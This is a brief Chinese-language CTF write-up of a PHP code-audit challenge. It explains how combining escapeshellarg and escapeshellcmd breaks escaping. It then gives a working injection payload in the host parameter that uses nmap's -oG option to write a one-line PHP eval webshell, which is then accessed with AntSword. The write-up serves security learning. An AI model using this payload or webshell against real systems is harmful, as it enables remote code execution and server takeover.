一段php审计下吧,不存在get参数host时高亮显示代码,不管先传个host看看
sandbox后面的值经过了md5,往下审计时发现俩个函数 escapeshellarg和escapeshellcmd
escapeshellarg将字符串转码可以在shell中使用的参数
两个函数一起使用时就出现了问题
执行命令时\解释为\不再是转译字符,所有的过滤都没有什么作用了
再往下审计有system命令,执行了nmap的命令这时第一个想到的就是写webshell啊擦
用nmap的-oG写文件
payload
?host='<?php @eval($_POST["c7ay"]);?> -oG c7ay.php'
蚁剑连一下找flag
专注,勤学,慎思。戒骄戒躁,谦虚谨慎